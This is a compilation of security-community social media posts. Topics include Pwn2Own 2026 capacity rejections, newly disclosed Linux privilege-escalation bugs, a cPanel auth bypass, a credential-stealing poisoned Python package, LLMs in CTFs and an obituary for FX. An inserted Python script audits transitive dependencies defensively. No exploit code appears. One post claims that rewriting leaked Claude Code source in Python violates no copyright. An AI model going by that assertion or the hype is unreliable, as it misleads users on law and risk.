‼️🚨 Pwn2Own Berlin 2026 just hit a wall. For the first time in 19 years, ZDI rejected dozens of working zero-day RCE submissions because organizers ran out of contest slots.
Rejected hackers are now going public with PoC demos and direct vendor disclosures, breaking Pwn2Own's usual secrecy.
▪️ AI surfaces a massive wave of 0-day RCEs.
▪️ Submissions overwhelm ZDI past max capacity.
▪️ Slots run out. Researchers with working chains get rejected.
▪️ "Revenge disclosures" begin. ← we are here.
Confirmed casualties so far:
▪️ @xchglabs : 86 vulnerabilities prepared (PyTorch, NVIDIA, Linux KVM, Oracle, Docker, Ollama, Chroma, LiteLLM, llama.cpp). All rejected. Now reporting directly to vendors with writeups dropping as patches land.
▪️ @ggwhyp : full-chain Firefox RCE on Windows. Rejected. Publicly demoed (HTML page → cmd.exe → calc.exe). Responsibly disclosed to Mozilla.
▪️ @yunsu_dev : working RCE chain, rejected. Submitting elsewhere.
▪️ @ryotkak : tried to register for 3+ weeks. ZDI confirmed "at maximum capacity, can't add extra contest days." Considered canceling flight and hotel.
▪️ @anzuukino2802 : Claude Code RCE PoC. Rejected.
▪️ @desckimh : 0-day RCEs in Ollama and LM Studio. Rejected.
Reported impact: a community-estimated 150+ researchers tried to register. Accepted contestants are now being warned about collisions. Rejected vulnerabilities going to bug bounty programs may trigger pre-event patches that invalidate the work of those who got in.
ZDI has not publicly addressed the capacity issue. The event still runs May 14-16 in Berlin.
💥 Introducing "Dirty Frag"
A universal Linux LPE chaining two vulns in xfrm-ESP and RxRPC. A successor class to Dirty Pipe & Copy Fail.
No race, no panic on failure, fully deterministic. ~9 years latent.
Ubuntu / RHEL / Fedora / openSUSE / CentOS / AlmaLinux, and more.
Even if you've applied the "Copy Fail" mitigation, your Linux is still vulnerable to "Dirty Frag". Apply the Dirty Frag mitigation.
Details:
https://t.co/9nqku4svkY
The Internet is falling down, falling down, falling down
Welcome back to another disaster - this time, an Auth Bypass in cPanel/WHM, tracked as CVE-2026-41940
Enjoy with us..
https://t.co/bOzCPy8iS1
https://t.co/ib5tIG14Wb -> Severe Linux kernel LPE with public and reliable exploit.
"Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distro since 2017."
I too woke up and chose violence today as the fail-copy POC dropped.
Made a clean exploit including fixing the UID post exploitation without rebooting the target server. Smoke those CTFs in Hack The Box.
https://t.co/nRiFyXQzRe
This is either brilliant or scary:
Anthropic accidentally leaked the TS source code of Claude Code (which is closed source). Repos sharing the source are taken down with DMCA.
BUT this repo rewrote the code using Python, and so it violates no copyright & cannot be taken down!
🎗️ "Medium-Sized" LLM Burners Coming Soon! 🔥
This Could Make Local HyperToken Generation a Reality. ⚡️ NVIDIA’s worst nightmare? 😱
⚙️ Application-Specific Hardware
Taalas' new PCIe ASIC board would burn the entire medium-sized Qwen 3.5-27B LLM straight into silicon 🤯 (already doing it with small models)
Taalas said medium models on ASIC would be available in their lab by Spring '26.
💭Imagine:
🚫 No more loading weights
🚀 ~10,000 Tokens Per Second locally (Llama 3.1 8B already @ 17,000 tps)
💻 Standard PC slot, ultra-low power (10x less) 🔋
🌍 100% offline with no cloud, no GPU farm
💰 Reddit unit cost rumor $300 to $400
🖥️ Imagine HyperToken generation on your desktop.
🤖 AI agents that think at light speed. ⚡️ Are you ready? 👀
🚨 Andrej Karpathy just explained the scariest thing happening in software right now..
someone poisoned a Python package that gets 97 million downloads a month.. and a simple pip install was enough to steal everything on your machine..
SSH keys.. AWS credentials.. crypto wallets.. database passwords.. git credentials.. shell history.. SSL private keys.. everything..
and here's the part that should terrify every developer alive..
the attack was only discovered because the attacker wrote sloppy code.. the malware used so much RAM that it crashed someone's computer.. if the attacker had been better at coding.. nobody would have noticed for weeks..
one developer.. using Cursor with an MCP plugin.. had litellm pulled in as a dependency they didn't even know about.. their machine crashed.. and that crash saved thousands of companies from getting their entire infrastructure stolen..
Karpathy's take is the real wake up call.. every time you install any package you're trusting every single dependency in its tree.. and any one of them could be poisoned..
vibe coding saved us this time.. the attacker vibe coded the attack and it was too sloppy to work quietly.. next time they won't make that mistake.
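The post's lesson is that a package you never named can arrive through someone else's dependency tree. The script below is an added example (not from the post, from Karpathy, or from any project named above) that walks a dependency graph shaped like the output of `importlib.metadata.requires()` and reports every package that was pulled in transitively but never declared, with the path that brought it in. The graph in `CONSTRUCTED_REQUIRES` is constructed for illustration: `mcp-editor-plugin`, `mcp` and `llm-bridge` are hypothetical names standing in for an editor plugin that indirectly pulls in litellm; only the real-environment lookup in `live_requires` queries actual installed metadata.

```python
"""Surface transitive dependencies you never asked for.

Added example, not code from the post or any project it mentions. The
graph below is constructed; the plugin and shim names are hypothetical.
"""
from __future__ import annotations

import re
from collections import deque
from importlib import metadata

# Constructed metadata, shaped like importlib.metadata.requires() output:
# each value is a list of PEP 508 requirement strings (hypothetical names).
CONSTRUCTED_REQUIRES: dict[str, list[str]] = {
    "mcp-editor-plugin": ["mcp>=1.0", "httpx"],   # hypothetical editor plugin
    "mcp": ["llm-bridge", "pydantic>=2"],          # hypothetical
    "llm-bridge": ["litellm>=1.40"],               # hypothetical shim that pulls litellm
    "litellm": ["openai", "tiktoken; extra == 'proxy'"],
    "httpx": ["certifi"],
    "pydantic": [],
    "openai": ["httpx"],
    "tiktoken": [],
    "certifi": [],
}

_NAME_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)")


def requirement_name(req: str) -> str:
    """Normalised project name from a PEP 508 requirement string.

    Drops version specifiers and environment markers, lower-cases, and
    maps '_' to '-' so 'Foo_Bar>=1' and 'foo-bar' compare equal.
    """
    m = _NAME_RE.match(req)
    if not m:
        raise ValueError(f"unparseable requirement: {req!r}")
    return m.group(1).lower().replace("_", "-")


def marker_is_extra(req: str) -> bool:
    """True for optional dependencies that only install with an extra."""
    return "extra ==" in req


def transitive_deps(roots, requires_of, include_extras=False) -> dict[str, list[str]]:
    """Breadth-first walk; returns {package: path of packages from a root}."""
    paths: dict[str, list[str]] = {}
    queue: deque[str] = deque()
    for r in roots:
        name = requirement_name(r)
        paths[name] = [name]
        queue.append(name)
    while queue:
        pkg = queue.popleft()
        for req in requires_of(pkg) or []:   # unknown packages yield no edges
            if marker_is_extra(req) and not include_extras:
                continue
            dep = requirement_name(req)
            if dep not in paths:             # first path found wins; also breaks cycles
                paths[dep] = paths[pkg] + [dep]
                queue.append(dep)
    return paths


def unexpected_packages(declared, requires_of, include_extras=False) -> dict[str, str]:
    """Packages reachable from the declared set that were never declared."""
    declared_names = {requirement_name(d) for d in declared}
    paths = transitive_deps(declared, requires_of, include_extras)
    return {p: " -> ".join(path) for p, path in paths.items() if p not in declared_names}


def live_requires(pkg: str) -> list[str]:
    """Same lookup against the real installed environment (empty if absent)."""
    try:
        return metadata.requires(pkg) or []
    except metadata.PackageNotFoundError:
        return []


if __name__ == "__main__":
    # Audit the constructed graph: what does installing the plugin really bring?
    report = unexpected_packages(["mcp-editor-plugin"], CONSTRUCTED_REQUIRES.get)
    for pkg, path in sorted(report.items()):
        print(f"{pkg:12s} via {path}")
```

Pass `live_requires` instead of `CONSTRUCTED_REQUIRES.get`, with your own top-level requirements as `declared`, to run the same audit against a real virtualenv; anything it prints is a package whose maintainers you are trusting without having chosen them, which is where hash-pinned lock files and an allowlist review belong.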
https://t.co/L1hRl7O7rJ this sums up the CTF vs LLM stuff nicely. Good job @Lina_Hoshino !
the competitive metric (ctftime) is dead/a gimmick at this point...
.. as a retired and washed up competitive ctf player with user id #18 on ctftime it is kinda saddening to see it implode like this. ;-(
I simply don't see any workable solution to bring back fair competitive CTF (with varying difficulty).
you could argue "well anyone can use the LLMs, that levels the playing field". by definition that means
1) you need anti-LLM (difficult) tasks, killing the element of having varying difficulty ("something fun for everyone").
2) teams/entities with cashflow could buy more clankers/compute/access to more expensive models, etc.
3) you're really gonna sit there and watch codex dream up "the house of force" instead of revisiting github dot com slash shellphish slash how2heap all by yourself
and yes I'm aware of all the various "underhanded" CTF tactics teams have employed over the years (where is that picture of the iceberg?); but forcing everyone who wants to compete to start using the ridiculous cheatcode doesn't feel like it addresses/fixes anything..
back in the days when we had to address fairness adjustment in the scoring algo of individual CTFs or ctftime as a whole we'd have a civil discussion (that would sometimes quickly erupt into a full on flamewar) on IRC with the involved parties. I'm afraid the solution is not so simple this time around :)
yo @kyprizel @leetmore @snkdna @hellman1908 I'm curious to hear how you people feel/think about this situation
I started playing CTFs in 2022, and LLMs definitely changed the **competitive** CTF scene a lot, especially since mid-2025. I also started using LLMs in late 2025. Yes, those models did one-shot many challenges, but what's the fun of slopping them? I learned absolutely nothing 🥲
Maybe you never used DPL (Default Password List) from Phenoelit. Or perhaps you never attended Ph-Neutral in Berlin. But you must have heard of "FX" from Phenoelit. The legendary old-school hacker (49yo) passed away on 2026-03-01 :-(. RIP & Thank You for your huge contribution.
Remembering memories with my friend Felix ‘FX’ Lindner @41414141, hacker extraordinaire with a huge heart, who passed away last week. Whether in Berlin, San Francisco, or Sao Paulo, hanging out with FX was never dull. FX was profiled in @phrack #68 https://t.co/CshcZBcJlL
LaLiga has been ordering Spanish ISPs to block ~3000 IP addresses almost every weekend. Because Cloudflare IPs are shared, this has been doing massive collateral damage to thousands of legitimate websites, apps, and vital services - all at the whim of a private corporation.
Don't miss the Hardware Hacking Congress in Spanish (Spain), completely FREE. Universidad Rey Juan Carlos (URJC). April 18. Limited places https://t.co/sH0OEr5TvX